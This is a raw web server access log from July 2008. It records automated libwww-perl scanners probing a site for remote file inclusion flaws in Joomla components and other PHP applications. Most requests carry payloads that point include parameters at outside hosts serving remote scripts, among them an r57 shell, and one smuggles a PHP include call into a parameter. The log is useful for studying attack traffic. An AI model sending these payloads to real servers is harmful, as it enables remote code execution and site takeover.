195.5.163.212 - - [29/Jul/2008:05:02:48 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://purearcade.com/id.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
195.5.163.212 - - [29/Jul/2008:05:02:49 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://purearcade.com/id.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
89.108.90.121 - - [29/Jul/2008:05:02:54 -0500] "GET //include.php?path[docroot]=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
89.108.90.121 - - [29/Jul/2008:05:02:57 -0500] "GET /logs//include.php?path[docroot]=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
213.33.84.163 - - [29/Jul/2008:05:03:21 -0500] "GET /logs/access_log.1212883200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.boardal.com/lang/id2.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.33.84.163 - - [29/Jul/2008:05:03:21 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.boardal.com/lang/id2.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.33.84.163 - - [29/Jul/2008:05:03:22 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.boardal.com/lang/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.33.84.163 - - [29/Jul/2008:05:04:49 -0500] "GET /logs/access_log.1214438400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.boardal.com/lang/id2.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
195.95.229.220 - - [29/Jul/2008:05:08:10 -0500] "GET /logs/access_log.1214438400//modify.php?dir_module=http://h-pro.ru/lang/inc? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
195.95.229.220 - - [29/Jul/2008:05:08:10 -0500] "GET //modify.php?dir_module=http://h-pro.ru/lang/inc? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
195.95.229.220 - - [29/Jul/2008:05:08:11 -0500] "GET /logs//modify.php?dir_module=http://h-pro.ru/lang/inc? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.230.17.22 - - [29/Jul/2008:05:10:28 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/jembutzmu/31377os.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
87.230.17.22 - - [29/Jul/2008:05:10:28 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/jembutzmu/31377os.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
82.215.5.179 - - [29/Jul/2008:05:10:56 -0500] "GET /logs/access_log.1214438400//toolbar.php?dirDepth=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
82.215.5.179 - - [29/Jul/2008:05:10:59 -0500] "GET //toolbar.php?dirDepth=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
82.215.5.179 - - [29/Jul/2008:05:11:00 -0500] "GET /logs//toolbar.php?dirDepth=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
72.3.138.50 - - [29/Jul/2008:05:12:33 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.65"
72.3.138.50 - - [29/Jul/2008:05:12:33 -0500] "GET /lostpasswd.php?env[include_prefix]=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
195.95.229.220 - - [29/Jul/2008:05:13:09 -0500] "GET /logs/access_log.1212883200//modify.php?dir_module=http://h-pro.ru/lang/inc? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
190.54.62.66 - - [29/Jul/2008:05:14:28 -0500] "GET /logs//amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.altosinc.com/laknat/ccc.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
190.54.62.66 - - [29/Jul/2008:05:14:29 -0500] "GET //amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.altosinc.com/laknat/ccc.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
195.5.163.212 - - [29/Jul/2008:05:15:10 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://purearcade.com/id.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
195.5.163.212 - - [29/Jul/2008:05:15:10 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://purearcade.com/id.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
64.26.63.17 - - [29/Jul/2008:05:15:12 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://paijoe.007gb.com/cmd.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
64.26.63.17 - - [29/Jul/2008:05:15:13 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://paijoe.007gb.com/cmd.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.803"
205.234.232.195 - - [29/Jul/2008:05:15:26 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.812"
205.234.232.195 - - [29/Jul/2008:05:15:26 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.812"
201.130.79.130 - - [29/Jul/2008:05:17:58 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
201.130.79.130 - - [29/Jul/2008:05:17:58 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
201.130.79.130 - - [29/Jul/2008:05:17:58 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
201.130.79.130 - - [29/Jul/2008:05:17:58 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
89.108.90.121 - - [29/Jul/2008:05:18:27 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
202.174.82.199 - - [29/Jul/2008:05:18:42 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
202.174.82.199 - - [29/Jul/2008:05:18:42 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
202.174.82.199 - - [29/Jul/2008:05:18:42 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
202.174.82.199 - - [29/Jul/2008:05:18:42 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
193.207.106.54 - - [29/Jul/2008:05:22:52 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
193.207.106.54 - - [29/Jul/2008:05:22:52 -0500] "GET /lostpasswd.php?env[include_prefix]=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
64.26.63.17 - - [29/Jul/2008:05:26:13 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://paijoe.007gb.com/cmd.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
209.51.219.170 - - [29/Jul/2008:05:27:43 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://shra.net/rar.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.65"
209.51.219.170 - - [29/Jul/2008:05:27:43 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://shra.net/rar.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
207.44.234.103 - - [29/Jul/2008:05:28:05 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
207.44.234.103 - - [29/Jul/2008:05:28:06 -0500] "GET //skin/zero_vote/error.php?dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
62.152.41.170 - - [29/Jul/2008:05:29:31 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
62.152.41.170 - - [29/Jul/2008:05:29:31 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
62.76.116.20 - - [29/Jul/2008:05:31:15 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
62.76.116.20 - - [29/Jul/2008:05:31:15 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
81.169.186.162 - - [29/Jul/2008:05:31:42 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
81.169.186.162 - - [29/Jul/2008:05:31:43 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
81.169.186.162 - - [29/Jul/2008:05:31:43 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
81.169.186.162 - - [29/Jul/2008:05:31:43 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
203.27.8.25 - - [29/Jul/2008:05:32:00 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
203.27.8.25 - - [29/Jul/2008:05:32:01 -0500] "GET //index.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
66.216.91.89 - - [29/Jul/2008:05:32:09 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
66.216.91.89 - - [29/Jul/2008:05:32:09 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
217.75.193.70 - - [29/Jul/2008:05:33:05 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.lametaradio.com/scripts/romid.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
217.75.193.70 - - [29/Jul/2008:05:33:05 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.lametaradio.com/scripts/romid.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
217.75.193.70 - - [29/Jul/2008:05:33:05 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.lametaradio.com/scripts/romid.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
217.75.193.70 - - [29/Jul/2008:05:33:05 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.lametaradio.com/scripts/romid.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
64.26.63.17 - - [29/Jul/2008:05:34:40 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://paijoe.007gb.com/cmd.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
64.26.63.17 - - [29/Jul/2008:05:34:40 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://paijoe.007gb.com/cmd.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
85.214.120.115 - - [29/Jul/2008:05:34:53 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.69"
85.214.120.115 - - [29/Jul/2008:05:34:53 -0500] "GET //skin/zero_vote/error.php?dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.69"
202.174.82.199 - - [29/Jul/2008:05:35:28 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
202.174.82.199 - - [29/Jul/2008:05:35:28 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
202.174.82.199 - - [29/Jul/2008:05:35:29 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
202.174.82.199 - - [29/Jul/2008:05:35:29 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
66.209.91.189 - - [29/Jul/2008:05:36:26 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.steelselect.com/resource_library/ips.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
66.209.91.189 - - [29/Jul/2008:05:36:26 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.steelselect.com/resource_library/ips.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
66.216.91.89 - - [29/Jul/2008:05:37:14 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
66.216.91.89 - - [29/Jul/2008:05:37:14 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
64.119.177.12 - - [29/Jul/2008:05:37:54 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
64.119.177.12 - - [29/Jul/2008:05:37:54 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
84.33.1.189 - - [29/Jul/2008:05:38:08 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
84.33.1.189 - - [29/Jul/2008:05:38:08 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
64.26.63.17 - - [29/Jul/2008:05:38:14 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://paijoe.007gb.com/cmd.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
64.26.63.17 - - [29/Jul/2008:05:38:14 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://paijoe.007gb.com/cmd.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
88.84.151.157 - - [29/Jul/2008:05:39:31 -0500] "GET /logs/access_log.1212883200//config.php?DIR=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
88.84.151.157 - - [29/Jul/2008:05:39:32 -0500] "GET //config.php?DIR=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
88.84.151.157 - - [29/Jul/2008:05:39:32 -0500] "GET /logs//config.php?DIR=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
62.152.41.170 - - [29/Jul/2008:05:40:23 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
62.152.41.170 - - [29/Jul/2008:05:40:24 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
209.51.219.170 - - [29/Jul/2008:05:41:09 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://fisurf.org/forum/scanzid.txt???? HTTP/1.1" 404 348 "-""libwww-perl/5.65"
209.51.219.170 - - [29/Jul/2008:05:41:09 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://fisurf.org/forum/scanzid.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
64.26.63.17 - - [29/Jul/2008:05:42:05 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://paijoe.007gb.com/cmd.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
64.26.63.17 - - [29/Jul/2008:05:42:05 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://paijoe.007gb.com/cmd.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
195.54.9.218 - - [29/Jul/2008:05:42:56 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geneseobeadstudio.com/safe.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
195.54.9.218 - - [29/Jul/2008:05:42:57 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geneseobeadstudio.com/safe.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
72.3.138.50 - - [29/Jul/2008:05:43:09 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
72.3.138.50 - - [29/Jul/2008:05:43:09 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
74.6.18.231 - - [29/Jul/2008:05:43:33 -0500] "GET /logs/access_log.1212019200 HTTP/1.0" 200 360207 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.41.4.26 - - [29/Jul/2008:05:43:59 -0500] "GET /logs/?sourcedir=http://alamal-de.com/db/on.txt? HTTP/1.1" 200 93161 "-""libwww-perl/5.805"
67.41.4.26 - - [29/Jul/2008:05:43:59 -0500] "GET /?sourcedir=http://alamal-de.com/db/on.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
64.119.177.12 - - [29/Jul/2008:05:44:31 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
64.119.177.12 - - [29/Jul/2008:05:44:31 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
91.121.192.238 - - [29/Jul/2008:05:47:16 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://szalikowcy.mlodzi.pl/serwis/uploads/download/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
91.121.192.238 - - [29/Jul/2008:05:47:16 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://szalikowcy.mlodzi.pl/serwis/uploads/download/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
89.111.179.12 - - [29/Jul/2008:05:48:26 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
89.111.179.12 - - [29/Jul/2008:05:48:26 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
193.207.106.54 - - [29/Jul/2008:05:49:53 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
193.207.106.54 - - [29/Jul/2008:05:49:53 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
195.70.36.107 - - [29/Jul/2008:05:51:55 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
195.70.36.107 - - [29/Jul/2008:05:51:55 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
69.73.165.251 - - [29/Jul/2008:05:53:04 -0500] "GET /logs//ashnews.php?pathtoashnews=http://seanmiller.net/book/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
69.73.165.251 - - [29/Jul/2008:05:53:04 -0500] "GET //ashnews.php?pathtoashnews=http://seanmiller.net/book/id.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.810"
67.41.4.26 - - [29/Jul/2008:05:54:14 -0500] "GET /logs/errors.php?error=http://alamal-de.com/db/on.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.41.4.26 - - [29/Jul/2008:05:54:14 -0500] "GET /errors.php?error=http://alamal-de.com/db/on.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
202.174.82.199 - - [29/Jul/2008:05:55:44 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
202.174.82.199 - - [29/Jul/2008:05:55:44 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
202.174.82.199 - - [29/Jul/2008:05:55:45 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
202.174.82.199 - - [29/Jul/2008:05:55:45 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
213.228.155.43 - - [29/Jul/2008:05:56:51 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
213.228.155.43 - - [29/Jul/2008:05:56:52 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
89.108.90.121 - - [29/Jul/2008:05:57:01 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
89.108.90.121 - - [29/Jul/2008:05:57:04 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
209.51.219.170 - - [29/Jul/2008:05:58:52 -0500] "GET /logs/errors.php?error=http://shra.net/rar.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
209.51.219.170 - - [29/Jul/2008:05:58:52 -0500] "GET /errors.php?error=http://shra.net/rar.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
89.108.66.182 - - [29/Jul/2008:06:00:04 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://bosanskinovi.info/components/com_zoom/lib/id?? HTTP/1.1" 404 341 "-""libwww-perl/5.812"
89.108.66.182 - - [29/Jul/2008:06:00:05 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://bosanskinovi.info/components/com_zoom/lib/id?? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
62.152.41.170 - - [29/Jul/2008:06:03:04 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
62.152.41.170 - - [29/Jul/2008:06:03:06 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
89.108.90.121 - - [29/Jul/2008:06:03:34 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
72.3.138.50 - - [29/Jul/2008:06:05:09 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
72.3.138.50 - - [29/Jul/2008:06:05:09 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.65"
72.3.138.50 - - [29/Jul/2008:06:05:50 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
72.3.138.50 - - [29/Jul/2008:06:05:50 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.65"
72.3.138.50 - - [29/Jul/2008:06:07:52 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
72.3.138.50 - - [29/Jul/2008:06:07:52 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.65"
66.230.220.147 - - [29/Jul/2008:06:09:47 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.benjaminclayton.co.uk//skins/advanced/dhelp01.txt?%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
66.230.220.147 - - [29/Jul/2008:06:09:47 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.benjaminclayton.co.uk//skins/advanced/dhelp01.txt?%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
